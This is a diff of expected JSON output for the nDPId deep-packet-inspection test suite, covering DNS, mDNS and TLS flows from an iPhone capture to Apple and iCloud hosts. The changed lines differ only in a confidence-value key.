+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454598247,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.185.87"}} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454598248,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1582454598248,"pkt":"xGGLNYKpxiwDYGpkCABFAADVXGwAAEARmEnAqAIBwKgCEQA18aYAwXDXjvGBgAABAAQAAAAACmdzcGUzNS1zc2wCbHMFYXBwbGUDY29tAAABAAHADAAFAAEAAAtxACQKZ3NwZTM1LXNzbAhscy1hcHBsZQNjb20GYWthZG5zA25ldADANQAFAAEAAAFNACIKZ3NwZTM1LXNzbAJscwVhcHBsZQNjb20HZWRnZWtlecBUwGUABQABAAARlgAWBWU2OTg3AmU5CmFrYW1haWVkZ2XAVMCTAAEAAQAAAA8ABF9lGTU="} 
-00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}} 
00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454598252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1582454598252,"pkt":"xGGLNYKpxiwDYGpkCABFAACEYIUAAEARlIHAqAIBwKgCEQA12moAcAk\/JH+BgAABAAIAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAcAMAAUAAQAADY0AJAlnc3A4NS1zc2wJbHMyLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA0AAEAAQAAAD8ABBGCAi4="} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454598287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598287,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyCcAAEARLJTAqAIBwKgCEQA1xz8Au1lGYEOBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAAC8AA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAOYAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEQAEEf1pysB\/AAEAAQAAABEABBH9Nco="} 
-00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454598287,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598373,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8dgsAAP8RwELAqAIRwKgCAdihADUAKKMQFxsBAAABAAAAAAAABG1lc3UFYXBwbGUDY29tAAABAAE="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454598373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"AQBeAAD7xGGLNYKpCABFAABemlUAAP8RfYTAqAIR4AAA+xTpFOkASu+LAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598373,"flow_last_seen":1582454598373,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454598373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1582454598373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"thread_ts_msec":1582454598373,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598377,"flow_last_seen":1582454598377,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598377,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454598377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598377,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/2TAqAIRX2UZNcWQAbugppinAAAAALDC\/\/8BIgAAAgQFtAEDAwcBAQgKEd\/nTAAAAAAEAgAA"} 
@@ -97,221 +97,221 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"} 
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAADIRW8AAEARr1PAqAIBwKgCEQA12KEAtAJjFxuBgAABAAUAAAAABG1lc3UFYXBwbGUDY29tAAABAAHADAAFAAEAAAfrAB8IbWVzdS1jZG4FYXBwbGUDY29tBmFrYWRucwNuZXQAwCwABQABAAAMoAAYCG1lc3UtY2RuDG9yaWdpbi1hcHBsZcA7wFcABQABAAAARAARBG1lc3UBZwdhYXBsaW1nwBfAewABAAEAAAAPAAQR\/WnKwHsAAQABAAAADwAEEf01yw=="} -00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 